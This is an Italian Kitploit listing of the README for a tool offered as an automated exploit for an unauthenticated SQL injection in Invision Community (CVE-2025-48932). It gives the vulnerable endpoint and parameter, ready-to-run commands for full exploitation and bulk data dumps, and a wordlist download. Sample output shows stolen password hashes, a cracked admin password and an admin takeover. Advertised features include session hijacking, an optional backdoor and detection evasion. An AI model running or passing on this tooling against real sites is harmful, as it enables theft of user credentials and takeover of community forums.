Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-48932-Invision-Community-SQLi-Exploit — CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna | Kitploit
Strumenti/GitHubGitHub/cerberusmrxi/cve-2025-48932-invision-community-sqli-exploit
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationInformation GatheringPost-ExploitationWeb SecurityPenetration Testing

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHubcerberusmrxi/cve-2025-48932-invision-community-sqli-exploit

CVE-2025-48932-Invision-Community-SQLi-Exploit

Vedi Repository
118 giorni faNon ancora revisionato

Informazioni

CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna

Condividi

🔓 CVE-2025-48932 - Exploit di SQL Injection su Invision Community

Python Version License Security Status CVE Exploit-DB PRs Welcome Maintenance Hits


⚡ Panoramica sulla Vulnerabilità Critica

CVE-2025-48932 è una vulnerabilità critica di blind SQL injection non autenticata scoperta in Invision Community versioni ≤ 4.7.20. Questo exploit consente ad aggressori remoti di:

  • 🔍 Estrarre informazioni sensibili dal database
  • 👤 Rubare credenziali utente e hash delle password
  • 🔑 Prendere il controllo degli account amministratore
  • 🎯 Dirottare le sessioni utente attive
  • 💻 Ottenere l'esecuzione remota di codice (RCE) tramite il takeover dell'amministratore
  • 📊 Eseguire il dump dell'intero contenuto del database

🎯 Funzionalità


📊 Demo e Screenshot

Esecuzione dell'Exploit

root@kitploit:~
$ python3 exploit.py -u https://vulnerable-site.com -v

╔══════════════════════════════════════════════════════════════════╗
║  CVE-2025-48932 - Invision Community SQL Injection               ║
║  Author: Sudeepa Wanigarathna                                    ║
║  Critical: Unauthenticated Remote Code Execution                 ║
╚══════════════════════════════════════════════════════════════════╝

[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!

[*] Enumerating database information...
[+] Database Information:
  Version: 10.4.32-MariaDB
  User: invision@localhost
  Database: invision_community
  Hostname: localhost
  Basedir: /usr/
  Datadir: /var/lib/mysql/

[*] Enumerating databases...
[+] Found 5 databases
  Found: information_schema
  Found: invision_community
  Found: mysql
  Found: performance_schema
  Found: phpmyadmin

[*] Enumerating tables in invision_community...
[+] Found 12 tables
  Found: core_members
  Found: core_sessions
  Found: admin_members
  Found: cms_categories
  Found: forums_posts
  ...

[*] Searching for credentials...
[+] Found credential table: core_members
  Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
  Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
  Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...

[*] Extracting admin information...
[+] Admin Information Found:
  name: admin
  email: [email protected]
  id: 1
  password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...

[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!

[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!

[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json

Esempio di Output JSON

root@kitploit:~
{
  "target": "https://vulnerable-site.com",
  "timestamp": "2026-08-02T12:34:56.789Z",
  "vulnerable": true,
  "database": {
    "version": "10.4.32-MariaDB",
    "user": "invision@localhost",
    "database": "invision_community",
    "hostname": "localhost"
  },
  "databases": [
    "information_schema",
    "invision_community",
    "mysql",
    "performance_schema",
    "phpmyadmin"
  ],
  "tables": [
    "core_members",
    "core_sessions",
    "admin_members"
  ],
  "credentials": [
    {
      "username": "admin",
      "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
      "email": "[email protected]"
    }
  ],
  "admin_info": {
    "name": "admin",
    "email": "[email protected]",
    "id": "1",
    "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
  },
  "summary": {
    "total_databases": 5,
    "total_tables": 12,
    "total_credentials": 3,
    "vulnerable": true,
    "successful": true
  }
}

🚀 Guida Rapida

Installazione

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit

# No dependencies to install! Just run it.

Utilizzo Base

root@kitploit:~
# Check if target is vulnerable
python3 exploit.py -u https://example.com --check-only

# Full exploitation with verbose output
python3 exploit.py -u https://example.com -v

# With proxy (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v

# Save results to custom file
python3 exploit.py -u https://example.com -o results.json

# Multi-threaded extraction (faster)
python3 exploit.py -u https://example.com -t 10

# Dump all available data
python3 exploit.py -u https://example.com --dump-all

Utilizzo Avanzato

root@kitploit:~
# With custom wordlist for password cracking
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v

# Silent mode (no output, just report)
python3 exploit.py -u https://example.com -o silent_report.json

# Debug mode with detailed errors
python3 exploit.py -u https://example.com -v --debug

📋 Requisiti

Requisiti di Sistema

  • Python: 3.6 o superiore
  • Sistema operativo: Linux, Windows, macOS (qualsiasi OS con Python)
  • Memoria: Minima (~50MB di RAM)
  • Spazio su disco: ~100KB (solo exploit)

Dipendenze

root@kitploit:~
✅ No external dependencies!
✅ Pure Python standard library only!
✅ No pip install or virtual environment needed!

Opzionale (Per il Cracking delle Password)

  • Wordlist: rockyou.txt o qualsiasi wordlist personalizzata
    root@kitploit:~
    # Download popular wordlist
    wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    

🛠️ Dettagli Tecnici

Posizione della Vulnerabilità

  • File: /applications/calendar/modules/front/calendar/view.php
  • Metodo: IPS\calendar\modules\front\calendar\view::search()
  • Parametro: location (input fornito dall'utente)
  • Tipo: Blind SQL Injection basata su risposte booleane

Vettore di Attacco

root@kitploit:~
GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]

Catena di Sfruttamento

  1. Rilevamento: rilevamento dell'iniezione basata su risposte booleane
  2. Enumerazione: estrazione della struttura del database
  3. Estrazione: scaricamento dei dati sensibili
  4. Furto di Credenziali: estrazione delle credenziali utente
  5. Escalation dei Privilegi: takeover dell'account amministratore
  6. Session Hijacking: furto delle sessioni attive
  7. Persistenza: creazione di una backdoor (opzionale)

Versioni di Database Supportate

  • MySQL 5.0+
  • MariaDB 5.5+
  • Percona Server

🔒 Avviso di Sicurezza e Legale

⚠️ DISCLAIMER IMPORTANTE

Questo strumento è destinato SOLO a scopi EDUCATIVI e di TEST AUTORIZZATO.

Utilizzando questo strumento, dichiari di accettare di:

  • Utilizzarlo solo su sistemi di tua proprietà o per i quali hai il permesso esplicito di effettuare test
  • Non utilizzarlo per scopi illegali o dannosi
  • Rispettare tutte le leggi e i regolamenti applicabili
  • Accettare la piena responsabilità delle tue azioni

L'accesso non autorizzato ai sistemi informatici è illegale e contrario all'etica.

Divulgazione Responsabile

  • Vendor: Invision Community
  • Data di divulgazione: 16 maggio 2025
  • Patch di sicurezza: Versione 4.7.21 (27 maggio 2025)
  • CVE: assegnato CVE-2025-48932

📚 Documentazione

Argomenti dell'Exploit

Struttura del Report

root@kitploit:~
invision_exploit_report_[timestamp].json
├── target                 # Target URL
├── timestamp              # Exploit timestamp
├── vulnerable             # Vulnerability status
├── database               # Database information
├── databases              # List of databases
├── tables                 # List of tables
├── credentials            # Extracted credentials
├── admin_info             # Admin user information
└── summary                # Exploitation summary

🎯 Casi d'Uso

Per Ricercatori di Sicurezza

  • ✅ Validazione delle vulnerabilità
  • ✅ Sviluppo di proof of concept
  • ✅ Valutazione della sicurezza
  • ✅ Caccia ai bug bounty

Per Penetration Tester

  • ✅ Test di penetrazione esterni/interni
  • ✅ Operazioni red team
  • ✅ Verifica delle vulnerabilità
  • ✅ Test di conformità

Per Amministratori di Sistema

  • ✅ Audit di sicurezza dei propri sistemi
  • ✅ Verifica delle patch
  • ✅ Indagini di incident response
  • ✅ Valutazione della postura di sicurezza

🐛 Risoluzione dei Problemi

Problemi Comuni e Soluzioni

Problema: Timeout di connessione

root@kitploit:~
# Solution: Increase timeout or check network
python3 exploit.py -u https://example.com --timeout 60

Problema: Errori del certificato SSL

root@kitploit:~
# Solution: Disable SSL verification (not recommended for production)
python3 exploit.py -u https://example.com --no-verify-ssl

Problema: Rilevato rate limiting

root@kitploit:~
# Solution: Reduce threads and increase delays
python3 exploit.py -u https://example.com -t 2 --delay 2

Problema: Nessun parametro vulnerabile trovato

root@kitploit:~
# Solution: Ensure calendar app is installed and GeoLocation is enabled
# Check: /applications/calendar/modules/front/calendar/view.php exists

📖 Riferimenti

Risorse Ufficiali

  • CVE-2025-48932
  • Invision Community
  • Bollettino di Sicurezza di Invision
  • Advisory Originale

Riferimenti Tecnici

  • OWASP SQL Injection
  • Blind SQL Injection
  • Documentazione MySQL

CVE Correlati

  • CVE-2024-xxxxx (Precedenti vulnerabilità di Invision)
  • CVE-2023-xxxxx (CVE correlati di piattaforme community)

🤝 Contributi

Siamo lieti di ricevere contributi! Consulta le nostre Linee Guida per i Contributi.

Come Contribuire

  1. Fai il fork del repository
  2. Crea un branch per la funzionalità (git checkout -b feature/AmazingFeature)
  3. Committa le modifiche (git commit -m 'Add some AmazingFeature')
  4. Esegui il push del branch (git push origin feature/AmazingFeature)
  5. Apri una Pull Request

Segnala Problemi

  • 🐛 Segnalazione Bug
  • 💡 Richiesta di Funzionalità
  • 🔒 Problema di Sicurezza

👨‍💻 Autore

Sudeepa Wanigarathna

Ricercatore di Sicurezza & Cacciatore di Bug Bounty

  • 🌐 GitHub
  • 🐦 Twitter
  • 💼 LinkedIn
  • 📧 Email

📄 Licenza

Questo progetto è concesso in licenza sotto la MIT License - consulta il file LICENSE per i dettagli.

root@kitploit:~
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

⭐ Mostra il Tuo Supporto

Se questo progetto ti è stato utile o lo hai trovato interessante:

  • ⭐ Metti una stella (Star) a questo repository
  • 🔗 Condividilo con la tua rete
  • 📢 Citalo nella tua ricerca sulla sicurezza
  • 🤝 Contribuisci a migliorarlo

🙏 Riconoscimenti

Sudeepa Wanigarathna

Ricercatore di Cybersecurity | Ingegnere del Software | Ingegnere CTF

Questo progetto è fornito per ricerca sulla sicurezza, analisi difensiva e test di penetrazione autorizzati. Gli utenti sono responsabili del rispetto di tutte le leggi applicabili e dell'ottenimento della dovuta autorizzazione prima dell'utilizzo.

Scarica lo strumento
FunzionalitàDescrizioneStato
🚀 Zero DipendenzeLibreria standard Python pura - nessuna installazione pip necessaria✅
⚡ Multi-ThreadingEstrazione dati rapidissima con thread configurabili✅
🤖 Completamente AutomatizzatoCatena di sfruttamento completa dal rilevamento al report✅
👑 Takeover dell'AmministratoreSession hijacking ed escalation dei privilegi✅
🔑 Estrazione di CredenzialiEstrae utenti, hash delle password, email✅
🔓 Cracking delle PasswordCracking degli hash integrato con supporto alle wordlist✅
📋 Report JSONOutput strutturato per analisi e documentazione✅
🔌 Supporto ProxyIntegrazione con Burp Suite e proxy personalizzati✅
🎨 Output a ColoriOutput del terminale accattivante con indicatori di avanzamento✅
🛡️ Rate LimitingRitardi integrati per evitare il rilevamento✅
ArgomentoDescrizioneEsempio
-u, --urlURL del target (obbligatorio)-u https://example.com
-p, --proxyURL del proxy-p http://127.0.0.1:8080
-t, --threadsNumero di thread (predefinito: 5)-t 10
-o, --outputFile di output per i risultati-o results.json
-v, --verboseAbilita output dettagliato (verbose)-v
--check-onlyControlla solo la vulnerabilità--check-only
--dump-allScarica tutti i dati disponibili--dump-all
--wordlistFile wordlist per il cracking--wordlist rockyou.txt